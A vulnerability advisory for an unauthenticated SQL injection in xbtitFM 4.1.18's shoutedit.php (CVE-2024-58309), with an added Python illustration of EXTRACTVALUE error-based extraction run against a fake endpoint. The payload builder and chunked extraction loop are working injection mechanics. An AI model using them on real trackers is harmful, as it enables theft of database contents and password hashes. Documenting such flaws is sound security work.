xbtitFM 4.1.18 Unauthenticated SQL Injection in shoutedit.php
CVE-2024-58309

8.7 HIGH

Key Information:

Vendor: Xbtitfm
Status: Vendor
CVE Published: 11 December 2025

Badges

👾 Exploit Exists

What is CVE-2024-58309?

xbtitFM 4.1.18 contains an unauthenticated SQL injection vulnerability in the msgid parameter of /shoutedit.php. The parameter reaches a MySQL query without sanitisation, so a remote attacker with no account can alter the query. The known attack is error-based: crafted requests embed MySQL's EXTRACTVALUE() function with an invalid XPath expression, and the database echoes the attacker-chosen subquery result (database names, user credentials, password hashes) back inside its XPath error message.
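How EXTRACTVALUE error-based extraction recovers data, as an added example that is not code from the xbtitFM project or from any published PoC for this CVE: it builds a probe for the msgid parameter, parses the MySQL XPath error that carries the leaked chunk, and drives a chunked extraction loop against a constructed stand-in for the endpoint. The unquoted numeric injection context, the 31-character chunk size, the fake table names, the sample values and the `fake_endpoint` function are assumptions made for illustration.

```python
"""Error-based (EXTRACTVALUE) SQL injection mechanics, illustrated offline.

Added example; not code from xbtitFM or from the CVE-2024-58309 PoC. The
injection context of msgid, the response wrapping, the table/column names and
the secret values below are all constructed assumptions.
"""
import re
from typing import Callable, Optional

# MySQL echoes the offending XPath string in "XPATH syntax error: '...'" but only
# its first 32 characters; with a leading '~' marker that leaves 31 data chars.
CHUNK = 31

# Assumed injection context: msgid is compared unquoted as a number. A quoted
# string context would need a different prefix/suffix (both would be guesses).
PREFIX = "1 AND "
SUFFIX = "-- -"


def make_probe(inner_select: str, offset: int = 1) -> str:
    """Build the msgid value that makes MySQL leak one chunk of `inner_select`."""
    sub = f"SUBSTRING(({inner_select}),{offset},{CHUNK})"
    return f"{PREFIX}EXTRACTVALUE(1,CONCAT(0x7e,{sub},0x7e)){SUFFIX}"


# Capture text after the leading '~'; the trailing '~' is absent when the 32-char
# truncation cut it off, hence the optional '~' before the closing quote.
LEAK_RE = re.compile(r"XPATH syntax error: '~([^']*?)~?'")


def parse_leak(body: str) -> Optional[str]:
    """Return the leaked chunk from a response that echoes the MySQL error, else None."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def extract_value(fetch: Callable[[str], str], inner_select: str) -> str:
    """Recover a full value chunk by chunk. `fetch(msgid)` returns one response body."""
    out, offset = "", 1
    while True:
        chunk = parse_leak(fetch(make_probe(inner_select, offset)))
        if chunk is None:
            raise RuntimeError("no XPATH error in response: not vulnerable or wrong context")
        out += chunk
        if len(chunk) < CHUNK:          # short chunk means the value ended
            return out
        offset += CHUNK


# Constructed stand-in for the vulnerable endpoint: a fake one-row database that
# answers a probe the way MySQL would (XPATH syntax error carrying the chunk).
# Table and column names are invented for the example.
FAKE_DB = {
    "SELECT database()": "xbtitfm_tracker",
    "SELECT CONCAT(username,0x3a,password) FROM xbtit_users LIMIT 1": "admin:" + "a" * 40,
}
SUB_RE = re.compile(r"SUBSTRING\(\((.+?)\),(\d+),(\d+)\)")


def fake_endpoint(msgid: str) -> str:
    """Emulate /shoutedit.php's observable behaviour for a probe (constructed)."""
    m = SUB_RE.search(msgid)
    if not m or m.group(1) not in FAKE_DB:
        return "<html>Shout updated</html>"
    value = FAKE_DB[m.group(1)]
    start, length = int(m.group(2)), int(m.group(3))
    echoed = ("~" + value[start - 1:start - 1 + length] + "~")[:32]
    return f"MySQL error: XPATH syntax error: '{echoed}'"


if __name__ == "__main__":
    # Against a live target, `fetch` would issue the HTTP request instead, e.g.
    # requests.get(base + "/shoutedit.php", params={"msgid": probe}).text
    # (GET vs POST placement of msgid is not stated on the page).
    for q in FAKE_DB:
        print(q, "->", extract_value(fake_endpoint, q))
```

The second query is 46 characters long, so the loop needs two round trips; the first chunk comes back without its closing marker because of MySQL's 32-character truncation, which is why the parser treats the trailing `~` as optional.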

Affected Version(s)

xbtitFM 4.1.18

References

CVSS v4

Score: 8.7
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: None

Timeline

  • 🟡 Public PoC available
  • 👾 Exploit known to exist
  • Vulnerability published
  • Vulnerability Reserved

Credit

xbtitFM Team